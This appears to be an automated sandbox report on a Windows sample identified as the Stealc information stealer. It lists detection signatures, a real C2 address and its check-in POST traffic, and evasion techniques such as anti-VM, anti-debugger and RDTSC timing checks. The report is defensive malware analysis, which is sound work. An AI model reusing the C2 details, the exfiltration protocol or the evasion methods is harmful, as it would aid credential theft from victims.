
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520640
MD5: fe0680dfa4a95f3c9f5efe7b68bebdc8
SHA1: e9bc2c7b21daeb95a9d77aa34afc1476648b573f
SHA256: aeb0218c5ae46c5d264100339920bca9c56a8f83b0a37383dbea2e33683d35d8
Tags: exe, MarsStealer, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FE0680DFA4A95F3C9F5EFE7B68BEBDC8)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Yara matches (network capture)
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security | -

Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | -
00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | -
00000000.00000003.1326837199.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | -
Process Memory Space: file.exe PID: 6952 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | -
Process Memory Space: file.exe PID: 6952 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | -

Yara matches (unpacked PE files)
Source | Rule | Description | Author | Strings
0.2.file.exe.ca0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | -

No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T17:41:16.620266+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49705 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.ca0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: file.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_00CAC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00CA9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00CA7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA9B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00CA9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00CB8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00CB38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00CB4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00CADA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00CAE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00CB4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00CAED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00CA16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00CB3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00CAF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00CABE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00CADE10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49705 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 30 44 33 35 30 41 33 30 31 44 33 36 36 33 38 31 32 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 2d 2d 0d 0a
    Data Ascii:
    ------BFCFBKKKFHCFHJKFIIEH
    Content-Disposition: form-data; name="hwid"

    4B0D350A301D3663812181
    ------BFCFBKKKFHCFHJKFIIEH
    Content-Disposition: form-data; name="build"

    save
    ------BFCFBKKKFHCFHJKFIIEH--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00CA4880
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    (Data Raw and Data Ascii identical to the POST request listed above)
Source: file.exe, 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1367337890.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37//%
Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/:%
Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0
Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpktop
Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37Wi

System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D | 0_2_0106E96D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107417D | 0_2_0107417D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010268A4 | 0_2_010268A4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010753A2 | 0_2_010753A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE523A | 0_2_00FE523A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010283F5 | 0_2_010283F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01070AD7 | 0_2_01070AD7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107252B | 0_2_0107252B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01188561 | 0_2_01188561
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106CDA5 | 0_2_0106CDA5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01055DE1 | 0_2_01055DE1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010A775F | 0_2_010A775F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01096E2B | 0_2_01096E2B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0115463A | 0_2_0115463A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F24F5E | 0_2_00F24F5E
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00CA45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: vpiveclu ZLIB complexity 0.9948866430841404
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00CB8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00CB3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\A6GWCLAY.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1847808 > 1048576
Source: file.exe | Static PE information: Raw size of vpiveclu is bigger than: 0x100000 < 0x19d000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ca0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;vpiveclu:EW;abjcrpar:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;vpiveclu:EW;abjcrpar:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00CB9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c75ac should be: 0x1c75a5
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: vpiveclu
Source: file.exe | Static PE information: section name: abjcrpar
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0115B91E push esi; mov dword ptr [esp], ebx | 0_2_0115B939
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F340FE push ecx; mov dword ptr [esp], edi | 0_2_00F34151
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F340FE push edi; mov dword ptr [esp], eax | 0_2_00F341A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F340FE push ebp; mov dword ptr [esp], 7BED5B1Bh | 0_2_00F341A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FD143 push ecx; mov dword ptr [esp], esp | 0_2_010FD1A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0113F141 push 5DA81FF7h; mov dword ptr [esp], edx | 0_2_0113F1EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0117D948 push esi; mov dword ptr [esp], edi | 0_2_0117DAA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push eax; mov dword ptr [esp], esp | 0_2_0106E9A7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push esi; mov dword ptr [esp], ebp | 0_2_0106E9BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push esi; mov dword ptr [esp], ebp | 0_2_0106E9CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push ecx; mov dword ptr [esp], esi | 0_2_0106E9DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push 4D2A876Ah; mov dword ptr [esp], ebp | 0_2_0106EA20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push edx; mov dword ptr [esp], edi | 0_2_0106EAA4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push ebp; mov dword ptr [esp], ecx | 0_2_0106EAB4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push 496D4BC9h; mov dword ptr [esp], eax | 0_2_0106EB29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push ebx; mov dword ptr [esp], edx | 0_2_0106EB4B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push edi; mov dword ptr [esp], eax | 0_2_0106EBDB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push ebx; mov dword ptr [esp], eax | 0_2_0106EBF7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push eax; mov dword ptr [esp], esi | 0_2_0106EC5A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push ebp; mov dword ptr [esp], edi | 0_2_0106ECB5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push 743B2B31h; mov dword ptr [esp], eax | 0_2_0106ECDA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push ecx; mov dword ptr [esp], ebp | 0_2_0106ECF2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push ebx; mov dword ptr [esp], edx | 0_2_0106ED28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push 5A14BEC4h; mov dword ptr [esp], ebx | 0_2_0106ED3E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push edx; mov dword ptr [esp], eax | 0_2_0106ED6F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push ecx; mov dword ptr [esp], 7CE9A9ECh | 0_2_0106EDAA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push edx; mov dword ptr [esp], 27AD0CD3h | 0_2_0106EE60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push edi; mov dword ptr [esp], 2AFC5582h | 0_2_0106EE9E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push 6F73E868h; mov dword ptr [esp], ebp | 0_2_0106EEAD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push edx; mov dword ptr [esp], ebx | 0_2_0106EF9E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106E96D push edi; mov dword ptr [esp], 57B55081h | 0_2_0106EFF1
Source: file.exe | Static PE information: section name: vpiveclu entropy: 7.954457957368027

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00CB9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13720
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F021B5 second address: F021CB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F86385196DCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107C277 second address: 107C27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107C27D second address: 107C2AB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F86385196E0h 0x00000014 jmp 00007F86385196DFh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107C2AB second address: 107C2BF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F863914EA26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F863914EA2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107C2BF second address: 107C2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1076990 second address: 10769AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F863914EA37h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10769AC second address: 10769C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F86385196DAh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10769C2 second address: 1076A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F863914EA38h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007F863914EA37h 0x00000015 ja 00007F863914EA26h 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1076A03 second address: 1076A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86385196E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B230 second address: 107B235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B235 second address: 107B245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86385196DAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B245 second address: 107B26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F863914EA2Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F863914EA2Ch 0x00000015 jbe 00007F863914EA26h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push esi 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B26F second address: 107B276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B276 second address: 107B280 instructions: 0x00000000 rdtsc 0x00000002 je 00007F863914EA2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B6E0 second address: 107B6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F86385196D6h 0x0000000a rdtsc
